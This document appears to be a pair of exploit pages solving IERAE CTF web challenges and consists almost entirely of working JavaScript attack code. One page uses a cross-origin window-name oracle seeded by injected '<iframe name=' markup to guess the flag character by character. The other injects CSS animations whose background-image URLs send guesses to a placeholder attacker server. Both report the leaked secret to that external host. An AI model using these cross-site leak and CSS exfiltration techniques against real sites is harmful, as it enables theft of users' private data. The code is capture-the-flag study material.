IERAE CTF web challenges
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>Exploit</title> | |
</head> | |
<body> | |
<script type="text/javascript"> | |
// Host that receives the `/log` callbacks (placeholder value in this listing).
const EXP_HOST = "http://YOUR_SERVER";
// Origin of the challenge application the oracle opens.
const WEB_HOST = "http://web:3000";
// Candidate characters tried for the next flag position; `}` is the closing brace.
const CHARS = "abcdefghijklmnopqrstuvwxyz}";
const sleep = async (msec) => new Promise((resolve) => setTimeout(resolve, msec)); | |
// Report `path` to EXP_HOST with a plain GET; the response body is ignored.
const log = async (path) => {
  debugger; // pauses here whenever DevTools is attached
  const url = `${EXP_HOST}${path}`;
  await fetch(url);
};
// Build a form with one text input per entry of `params`, attach it to the
// document and submit it with the given method/action into `target`.
const submitForm = (method, action, params, target="_blank") => {
  const form = Object.assign(document.createElement("form"), { method, action, target });
  for (const [name, value] of Object.entries(params)) {
    const field = Object.assign(document.createElement("input"), { type: "text", name, value });
    form.appendChild(field);
  }
  document.body.appendChild(form);
  form.submit();
};
const HIT_NAME=`</li>\n<li><span class=`; | |
// Open the challenge search page for `s` and report whether the opened window
// exposes a property named HIT_NAME. The result is decided by whether the
// property read throws, not by its value.
// NOTE(review): `w` has no const/let, so it becomes an implicit global that is
// overwritten on every call.
const oracle = async (s) => {
w = open(`${WEB_HOST}/?query=${s}`);
await sleep(300); // give the popup time to load before probing
try{
// typeof always yields a non-empty string, so this condition is true whenever
// the property read succeeds; a throwing read falls through to the catch below
// (presumably the cross-origin case when no frame of that name exists — confirm).
if (typeof w[HIT_NAME]) {
w.close();
return true;
}
} catch (e) {
console.log(e)
}
w.close();
return false;
}
// Try every character in CHARS after `prefix`; return the first extension the
// oracle accepts, or throw when none does.
const leak = async (prefix) => {
  for (const ch of CHARS) {
    const candidate = `${prefix}${ch}`;
    if (await oracle(candidate)) {
      return candidate;
    }
  }
  throw new Error("nope");
};
// Create the note the oracle relies on, then extend the known prefix one
// character at a time, reporting each step to EXP_HOST. Never returns normally.
const exploit = async () => {
  submitForm("POST", `${WEB_HOST}/create`, { note: '<iframe name="' });
  await sleep(1000);
  let known = "IERAE{";
  for (;;) {
    known = await leak(known);
    void log(`/log?${known}`); // deliberately not awaited
  }
};
// Entry point: run the exploit and log any error instead of leaving an
// unhandled rejection.
(async function run() {
  try {
    console.log("Start exploit");
    await exploit();
    console.log("Finished exploit");
  } catch (e) {
    console.log(e);
  }
})();
</script> | |
</body> | |
</html> |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>Exploit</title> | |
</head> | |
<body> | |
<script type="text/javascript"> | |
// Host that receives the `/hit` callbacks and serves `/prefix` (placeholder value).
const EXP_HOST = "http://YOUR_SERVER";
// Origin of the challenge application being probed.
const WEB_HOST = "http://web:3000";
// Candidate characters tried for the next flag position.
const CHARS = "abcdefghijklmnopqrstuvwxyz";
const sleep = async (msec) => new Promise((resolve) => setTimeout(resolve, msec)); | |
// Report `path` to EXP_HOST with a plain GET; the response body is ignored.
const log = async (path) => {
  const url = `${EXP_HOST}${path}`;
  await fetch(url);
};
// Build a form with one text input per entry of `params`, attach it to the
// document and submit it with the given method/action into `target`.
const submitForm = (method, action, params, target="_blank") => {
  const form = Object.assign(document.createElement("form"), { method, action, target });
  for (const [name, value] of Object.entries(params)) {
    const field = Object.assign(document.createElement("input"), { type: "text", name, value });
    form.appendChild(field);
  }
  document.body.appendChild(form);
  form.submit();
};
// For each candidate next character, open the challenge search page in a window
// named after the candidate, then create a note in that same window whose
// stylesheet points a background-image at `${EXP_HOST}/hit?leak=${prefix}/${c}`.
// Nothing is returned; the caller reads the accumulated prefix from `/prefix`.
// NOTE(review): per the inline comment below, a hit means the candidate is NOT
// a prefix of the flag — the opposite sense from a positive oracle; confirm
// the server-side handling of `/hit` agrees.
const leak = async (prefix) => {
for (let c of CHARS) {
const w = open(`${WEB_HOST}/?search=${prefix+c}`, prefix+c); // window name = candidate
await sleep(300); // let the search page load
w.focus();
// if the prefix is hit, the flag doesn't start with the prefix
submitForm("POST", `${WEB_HOST}/create`, {
title: `note-${prefix+c}`,
body: prefix+c,
style: `
@keyframes anim {
0% {
background-image: url(${EXP_HOST}/hit?leak=${prefix}/${c});
}
}
::view-transition-old(site-title) {
animation: 0.01s linear both anim;
}
::view-transition-new(site-title) {
animation: 0.01s linear both anim;
}
`
}, prefix+c) // target the window opened above, by name
await sleep(300); // give the navigation time to run before closing
w.close();
}
}
// Repeatedly probe the next character after the known prefix, then pull the
// updated prefix from this page's own origin (`/prefix` is a relative URL).
// Never returns normally.
const exploit = async () => {
  let known = "IERAE{";
  for (;;) {
    await leak(known);
    await sleep(300);
    const res = await fetch("/prefix");
    known = await res.text();
  }
};
// Entry point: run the exploit and log any error instead of leaving an
// unhandled rejection.
(async function run() {
  try {
    console.log("Start exploit");
    await exploit();
    console.log("Finished exploit");
  } catch (e) {
    console.log(e);
  }
})();
</script> | |
</body> | |
</html> |